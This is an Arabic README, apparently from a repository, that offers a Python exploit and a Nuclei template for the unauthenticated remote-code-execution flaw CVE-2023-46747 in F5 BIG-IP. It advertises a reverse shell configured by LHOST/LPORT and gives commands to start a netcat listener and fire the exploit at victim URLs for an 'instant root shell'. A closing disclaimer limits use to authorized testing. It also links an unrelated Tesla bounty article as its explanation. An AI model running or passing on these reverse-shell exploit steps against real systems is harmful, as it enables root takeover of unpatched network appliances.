
#F5-BIG-IP-CVE-2023-46747-Exploit – RCE بدون مصادقة إكسبلويت Python وقالب Nuclei من Raguraman ✓ صدفة عكسية TCP آلية (LHOST/LPORT) ✓ تم اختباره على الإصدارات المتأثرة من BIG-IP 13.x–17.x ⚠️ لاختبار الاختراق المصرح به فقط
إصدارا Python3 وNuclei – بواسطة raguraman
ثغرة RCE حرجة بدون مصادقة (CVSS 9.8) عبر AJP وتهريب طلبات HTTP تعمل على جميع إصدارات BIG-IP غير المُصحّحة 13.x → 17.x (بما في ذلك الأحدث 17.1.0.3) التصحيح: https://my.f5.com/manage/s/article/K000137353 (نوفمبر 2023)
شرح لاستغلال حقيقي من العالم الواقعي: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd
f5-bigip-cve-2023-46747-revshell.py → سكربت Python3 مستقل (موصى به)CVE-2023-46747-revshell.yaml → قالب Nuclei (اختياري)# 1. Start your listener
nc -lvnp 4444
# 2. Run the exploit (works with IP or domain)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50 YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444
# → Instant root shell!
الاستخدام – قالب Nuclei (بديل) Bash # 1. Edit LHOST and LPORT inside the YAML file
nc -lvnp 4444
nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com
هذه الأداة مخصصة حصريًا لاختبار الأمان المصرح به، مثل:
مهام اختبار الاختراق المعتمدة
عمليات الفريق الأحمر بإذن كتابي
الأبحاث في بيئة مختبرية خاضعة للتحكم
لا تستخدم هذا الاستغلال على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. الاستغلال غير المصرح به غير قانوني وقد يؤدي إلى الملاحقة الجنائية.
باستخدامك لهذه الأداة، فإنك تتحمل كامل المسؤولية عن الامتثال للقوانين السارية. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر.